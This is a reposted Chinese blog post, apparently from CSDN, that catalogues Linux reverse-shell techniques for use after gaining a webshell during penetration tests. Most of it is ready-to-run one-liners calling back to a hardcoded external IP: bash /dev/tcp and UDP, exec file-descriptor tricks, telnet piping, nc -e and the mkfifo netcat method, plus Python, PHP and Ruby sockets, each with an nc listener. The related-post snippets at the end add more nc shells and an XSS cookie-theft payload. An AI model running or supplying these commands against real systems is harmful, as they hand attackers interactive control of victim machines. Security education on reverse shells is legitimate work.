【好文转载】linux反弹shell的各种姿势

最新推荐文章于 2024-09-07 13:13:56 发布
最新推荐文章于 2024-09-07 13:13:56 发布
阅读量287 收藏
点赞数
分类专栏: 干货笔记 好文转载 文章标签: 服务器 web安全 系统安全 bash linux
原文链接:https://www.cnblogs.com/sunny11/p/14290092.html
版权

本文为转载,原作者与链接如下:
作者:@11阳光
https://www.cnblogs.com/sunny11/p/14290092.html

题记

搞完xss钓鱼一时不知道服务器还能干点什么,然后我就想到我cs搞了Windows,当然也要弹linux的shell,所以操作下linux反弹shell的命令。

在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是 通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹 shell来进行操作。在这里总结下反弹shell常见的几种姿势。

准备工作

外网服务器103.234.72.5
本地Kali一台,优班图一台。

Bash反弹

注意之前使用nc监听端口反弹shell时都会有一个警告:Warning: forward host lookup failed for bogon: Unknown host,根据nc帮助文档的提示加上-n参数就可以不产生这个警告了,-n参数代表在建立连接之前不对主机进行dns解析。

参考文章:

  1. 🔗Linux下几种反弹Shell方法的总结与理解 http://sohu.com/a/243607685_354899
  2. 🔗linux反弹shell的姿势-Avenue-le.pdf

方法一

监听的vps使用命令:

nc -nlvp 7777

被控机器使用命令:

#命令1:
bash -i >& /dev/tcp/103.234.72.5/7777 0>&1
#命令2:
bash -c 'exec bash -i &>/dev/tcp/103.234.72.5/7777 <&1'
#bash ‐i 打开一个交互的bash
# >& 将标准错误输出重定向到标准输出
#/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为 要反弹到的主机ip,port为端口
# 0>&1 标准输入重定向到标准输出,实现你与反弹出来的shell的交互

Kali外网攻击机
内网受害者

方法二

在使用这个进行shell反弹时,不能使用python获取一个标准的shell,需要使用 nc再次反弹之后,使用python获取标准化输出。

监听的vps使用命令:

nc -nlvp 7777

被控机器使用命令:

exec 5<>/dev/tcp/103.234.72.5/7777;cat <&5 | while read line; do $line 2>&5 >&5; done

在这里插入图片描述
在这里插入图片描述

方法三

命令一:

exec 0&0 2>&0 0<&196;exec 196<>/dev/tcp/103.234.72.5/7777; sh <&196 >&196 2>&196

在这里插入图片描述
在这里插入图片描述

命令二:

/bin/bash -i > /dev/tcp/103.234.72.5/6666 0<&1 2>&1

在这里插入图片描述
在这里插入图片描述

方法四

0<&196;exec 196<>/dev/tcp/103.234.72.5/7777; sh <&196 >&196 2>&196

在这里插入图片描述
在这里插入图片描述

bash UDP 反弹

nc -u -nlvp 7777

sh -i >& /dev/udp/103.234.72.5/7777 0>&1

在这里插入图片描述
在这里插入图片描述

telnet反弹

方法一

nc -nlvp 6666
nc -nlvp 7777

telnet 103.234.72.5 6666 | /bin/bash | telnet 103.234.72.5 7777

6666输入命令7777输出结果
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

方法二

mknod a p; telnet 103.234.72.5 7777 0<a | /bin/bash 1>a(不好用)

nc反弹

nc ‐e /bin/bash 103.234.72.5 7777

在这里插入图片描述
在这里插入图片描述
如果目标主机linux发行版本没有 -e 参数,还有以下方式:

方法一

rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 103.234.72.5 7777 >/tmp/f

在这里插入图片描述
在这里插入图片描述

exec 反弹

0<&196;exec 196<>/dev/tcp/103.234.72.5/7777; sh <&196 >&196 2>&196

在这里插入图片描述
在这里插入图片描述

python反弹

export RHOST="103.234.72.5";export RPORT=7777;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

在这里插入图片描述
在这里插入图片描述

PHP反弹

php -r '$sock=fsockopen("103.234.72.5",7777);exec("/bin/sh -i <&3 >&3 2>&3");'

在这里插入图片描述
在这里插入图片描述

ruby 反弹

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("103.234.72.5","7777");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

在这里插入图片描述
在这里插入图片描述

其他

我这里写了一些常用的,当其他的用的时候在去深入研究。

Wuyong_12
关注
专栏目录
mysql注入反弹_Discuz!x xss反弹后台无防御sql注入getshell(附带exploit)
weixin_29915703的博客
01-28 573
### 简要描述:Discuz!x xss反弹后台无防御sql注入getshell,这里的xss只是做一个药引子,因为xss来自日志功能,然而这个日志功能却又默认关闭的,为了测试我们开启它。这个漏洞应该是所有dz通杀的,我下载了最新版本的所以测试通过......### 详细说明:首先我们开启日志功能,然后存储一个xss看看:测试一个xss页面:[](https://images.seebug.or...
2024年运维最新【安全知识】——LInuxshell反弹姿势合集(更新中,【工作感悟】
m0_55030688的博客
05-04 622
bash -i 打开一个交互的bash& 将标准错误输出重定向到标准输出/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口0>&1 标准输入重定向到标准输出,实现你与反弹出来的shell的交互。
中国蚁剑AntSword反制 RCE漏洞复现 windows环境上反弹shell 吊打攻击你的黑客
Jiuchen的博客
03-16 3615
中国蚁剑(AntSword) 是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。黑客在你的web服务上植入了WebShell,利用蚁剑去连接并控制了你的电脑,这时被你发现了电脑被控制 变的卡卡的,并且发现了是通过web服务里的WebShell来控制你的,想到自己磁盘里几十G的秘密学习资料可能全部被窃取,你很不爽,你想找到这个黑客小子,绞尽脑汁想了很多办法也无法痛快的还击,直到你想起来在2023年3月16号读到的我这篇文章,你抱着试试看的态度去尝试了一下,发现
XSS基础
qq_43361634的博客
01-23 342
XSS基础一、XSS是什么?二、使用步骤1.引入库2.读入数据总结如何插 一、XSS是什么? XSS是一种经常出现在web应用程序中的计算机安全漏洞,是由于web应用程序对用户的输入过滤不严而产生的。攻击者利用网站漏洞把恶意的脚本代码注入到网页中,当其他用户浏览这些网页时,就会执行其中的恶意代码。 这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至是普通的HTML。攻击成功后,攻击者可能得到更高的权限(如执行一些操作)、私密网页内容、
网络安全 day5 --- 反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
最新发布
2302_81156108的博客
09-07 2002
学习网络安全的一些心得希望对大家起到一些帮助
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 5015
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
笔记:XSS浅析
04-13 1996
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言利用绕过 前言 XSS分类 反射型:非持久性,需要用户点击 存储型:持久性,代码存储在服务器,访问页面就可进行攻击 dom型(反射型):客户端脚本自身的解析不对导致的安全问题 利用 1.窃取COOLIE 2.恶意跳转 3.网页挂马/权限提升 4.通过msf生成木马url,调用反弹连解payload,设置监听ip,将木马url通过存储型XSS存储到服务器上,未打补丁访问者被攻击 绕过 1.无过滤 "><scrip.
Linux反弹Shell总结
qq_45600801的博客
01-06 4317
反弹姿势 1、NC正向反弹 靶机: nc -lvvp 靶机端口 -e /bin/sh 攻击机: nc 靶机ip 靶机端口 2、NC反向反弹 (1)、可使用-e参数: 靶机: nc x.x.x.x 8888 -e /bin/bash 攻击机: nc -lvvp 8888 (2)、NC,无-e参数反弹shell 有些版本的NC可能不支持-e选项,不能使用-e,则: 方法一: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc
mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解
weixin_39929465的博客
01-27 1436
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载。之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上...
Linux姿势反弹shell
ElsonHY的博客
12-26 1351
前言 以下反弹shell的各种方法是小R收集到的,部分没有复现成功的方法没有放上来,待复现成功后会慢慢把文章完善,如有错误请帮忙指出。 1.Nc -e反弹 攻击端: nc -lvp 23333 受害端: nc -e /bin/bash 192.168.154.129 23333 2.Bash -i反弹 攻击端: nc -lvp 23333 受害端: bash -i >/dev/tcp/192.168.154.129/23333 0>&1 2>&1 (b
Go-XSShell是一个XSS反向shell框架
08-14
XSShell是一个跨站点脚本的反向shell ...好吧,也许它不是一个真正的反向shell,但它允许你与XSS受害者的浏览器实时交互。
XSS漏洞分类
qq_39654116的博客
01-17 1003
目录反射型XSS储存型XSS反射型XSS与存储型XSS的区别DOM XSS可能触发DOM型xss的属性DOM型例子Blind XSS 反射型XSS 反射型XSS是比较常见和广泛的一类,举例来说,当一个网站的代码中包含类似下面的语句:<?php echo "<p>hello, $_GET['user']</p>";?> ,那么在访问时设置 /?user=</p><script>alert("hack")</script><p>
利用metasploit生成反弹shell程序,实现远程控制
qq_33163046的博客
08-20 4023
Metasploit生成反弹shell实现远程控制的方法具有高度定制化、多平台支持、强大的漏洞利用能力、无需事先安装恶意软件以及高度灵活和可扩展等优点。这使得用户能够根据具体需求和目标系统的特点,实现精确、有效和隐蔽的远程控制。
大街网反弹and存储型XSS漏洞及测试Payload
收集盒 Book box
06-06 1360
Freebuf.com首发,转载请注明出处。 前几个月去大街网上找实习,目前算是企业校招最权威的一个网站了,简单测试了下,储存型和反弹XSS应有尽有。 联系人查找处DOM XSS:http://www.dajie.com/card/exchange/index?keyWords=1234′);alert(document.cookie);// 短信息处储存XSS:前面加
反弹shell的N种姿势
weixin_42478365的博客
11-06 385
前言 在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。 0x01 Bash反弹 1.1 方法一 击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0>&1 #bash -i 打开一个交互的bash #>
阿里云提示进程异常行为反弹SHELL 该怎么处理
网站安全专家
09-01 1445
也希望我们的解决过程分享,能帮到更多的人。当天我们SINESAFE收到客户的电话咨询,客户的平台、APP和H5端、以及后台遭到黑客入侵,并篡改了数据库里面的数据,导致平台的损失过万,详细询问了客户的平台架构以及部署的服务器数量,发现客户用的是Thinkphp架构开发,APP的API接口和H5端以及后台管理都是在该架构的基础上开发的,因为这套代码是客户从买来后找的第三方公司进行的二次开发,第三方开发公司对里面的代码后门并不清楚,很多低价卖源码的,肯定是有利益可图的。...
webshell反弹shell使用详解
有勇气的牛排博客
07-24 1709
1 介绍 在对linux服务器渗透测试的过程中,我们在getshell得到一个低权限的webshell,由于webshell是非交互式shell,通常要反弹一个交互式的shell,然后提权(不然提权后,还是原来的权限) 2 webshell 获取 2.1 php策略 PHP环境下反弹shell,过去我们通常用phpspy等shell自带反弹即可,这里将其反弹部分代码提取出来,访问即可反弹到指定IP端口一个普通交互shell。 (1)下面利用weevely生成一个php weevely generate 12
深度解析:Linux反弹shell的分类与本质
本文通过全新的视角对Linux反弹shell进行了深入剖析,对于想要提升安全技能,特别是渗透测试技术的读者,是一份宝贵的参考资料。通过阅读和理解本文,读者不仅可以了解到反弹shell的基本概念,还能掌握其内在的技术...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值